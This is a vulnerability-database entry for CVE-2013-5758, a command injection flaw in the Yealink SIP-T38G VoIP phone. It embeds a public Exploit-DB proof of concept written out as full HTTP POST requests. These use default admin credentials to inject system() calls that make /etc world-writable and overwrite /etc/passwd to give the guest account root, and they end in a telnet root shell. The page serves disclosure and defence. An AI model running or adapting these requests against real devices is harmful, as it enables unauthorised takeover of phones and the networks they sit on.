CVE-2013-5758
Description
cgi-bin/cgiServer.exx in Yealink VoIP Phone SIP-T38G allows remote authenticated users to execute arbitrary commands by calling the system method in the body of a request, as demonstrated by running unauthorized services, changing directory permissions, and modifying files.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Yealink VoIP Phone SIP-T38G - Privilege Escalation
Title: Yealink VoIP Phone SIP-T38G Privileges Escalation
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5759
Description:
Using the fact that cgiServer.exx run under the root privileges we use the
command execution (CVE-2013-5758) to modify the system file restriction.
Then we add extra privileges to the guest account.
POC:
Step 1 - Changing /etc folder right to 777:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("/bin/busybox%20chmod%20-R%20777%20/etc")
Step 2 - Change guest user uid:
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
system("echo "root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:0:0:Guest,,,:/:/bin/sh\" > /etc/passwd
")
Step 3 - Connect back using telnet and guest account (password is guest):
# id
uid=0(root) gid=0(root)
Enjoy your root shell :)
--
*Mr.Un1k0d3r** or 1 #*Yealink VoIP Phone SIP-T38G - Remote Command Execution
References
- http://packetstormsecurity.com/files/127093/Yealink-VoIP-Phone-SIP-T38G-Privilege-Escalation.html
- http://packetstormsecurity.com/files/127096/Yealink-VoIP-Phone-SIP-T38G-Remote-Command-Execution.html
- http://www.exploit-db.com/exploits/33741
- http://www.exploit-db.com/exploits/33742
- http://www.osvdb.org/108080
- http://packetstormsecurity.com/files/127093/Yealink-VoIP-Phone-SIP-T38G-Privilege-Escalation.html
- http://packetstormsecurity.com/files/127096/Yealink-VoIP-Phone-SIP-T38G-Remote-Command-Execution.html
- http://www.exploit-db.com/exploits/33741
- http://www.exploit-db.com/exploits/33742
- http://www.osvdb.org/108080
CWEs
CWE-78
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.